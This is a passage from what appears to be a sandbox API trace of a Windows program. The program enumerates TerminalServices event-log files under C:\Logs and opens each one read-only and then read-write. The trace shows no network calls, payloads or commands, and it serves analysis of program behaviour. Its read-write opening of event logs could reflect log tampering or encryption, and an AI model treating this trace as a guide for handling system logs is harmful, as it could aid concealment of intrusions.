InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.442] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aa88 | out: hHeap=0x20000) returned 1 [0087.442] AreFileApisANSI () returned 1 [0087.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx", lpUsedDefaultChar=0x0) returned 75 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0087.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0087.443] AreFileApisANSI () returned 1 [0087.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.443] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85120 [0087.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0087.443] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.443] GetFileType (hFile=0x424) returned 0x1 [0087.443] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0087.443] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.443] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.443] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.443] CloseHandle (hObject=0x424) returned 1 [0087.444] AreFileApisANSI () returned 1 [0087.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x84fe0 [0087.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x84fe0, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0087.444] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.444] GetFileType (hFile=0x424) returned 0x1 [0087.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fe0 | out: hHeap=0x20000) returned 1 [0087.444] CloseHandle (hObject=0x424) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8b078 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b078 | out: hHeap=0x20000) returned 1 [0087.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0087.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0087.444] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a9f0 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ab20 [0087.444] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a6f8 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ab20 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a9f0 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a530 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a530 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0087.445] AreFileApisANSI () returned 1 [0087.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 75 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x96) returned 0x85620 [0087.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cf50, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=75 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx") returned 75 [0087.445] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5089d037, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5089d037, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0087.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.445] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.445] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cAlternateFileName="MI62D3~1.EVT")) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46438 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cae8 [0087.445] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46438 | out: hHeap=0x20000) returned 1 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.445] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c650 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c7a0 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c848 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81cb0 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c848 | out: hHeap=0x20000) returned 1 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81410 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81cb0 | out: hHeap=0x20000) returned 1 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81410 | out: hHeap=0x20000) returned 1 [0087.446] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c7a0 | out: hHeap=0x20000) returned 1 [0087.446] AreFileApisANSI () returned 1 [0087.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx", lpUsedDefaultChar=0x0) returned 81 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.446] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0087.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0087.447] AreFileApisANSI () returned 1 [0087.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.447] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f008 [0087.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0087.447] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.447] GetFileType (hFile=0x424) returned 0x1 [0087.447] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f008 | out: hHeap=0x20000) returned 1 [0087.447] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0087.447] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0087.447] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0087.448] CloseHandle (hObject=0x424) returned 1 [0087.448] AreFileApisANSI () returned 1 [0087.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5fd18 [0087.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x5fd18, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0087.448] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0087.448] GetFileType (hFile=0x424) returned 0x1 [0087.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0087.448] CloseHandle (hObject=0x424) returned 1 [0087.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ca40 [0087.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0087.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0087.448] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d370 [0087.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0087.448] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d370 | out: hHeap=0x20000) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d028 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c500 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d028 | out: hHeap=0x20000) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cce0 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c500 | out: hHeap=0x20000) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c6f8 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cce0 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c6f8 | out: hHeap=0x20000) returned 1 [0087.449] AreFileApisANSI () returned 1 [0087.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 81 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa2) returned 0x5f428 [0087.449] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x717c0, cbMultiByte=-1, lpWideCharStr=0x5f428, cchWideChar=81 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx") returned 81 [0087.449] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-terminalservices-localsessionmanager%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x508c32a6, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x508c32a6, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f428 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0087.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.449] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.449] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc14341c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc14341c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1dace07, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Admin.evtx", cAlternateFileName="MIEC03~1.EVT")) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0087.449] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0087.449] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46668 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8c650 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46668 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8ac50 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a828 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ac50 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c650 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a828 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8af48 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a400 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c8f0 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a400 | out: hHeap=0x20000) returned 1 [0087.450] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d220 [0087.450] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c8f0 | out: hHeap=0x20000) returned 1 [0087.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0087.450] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: 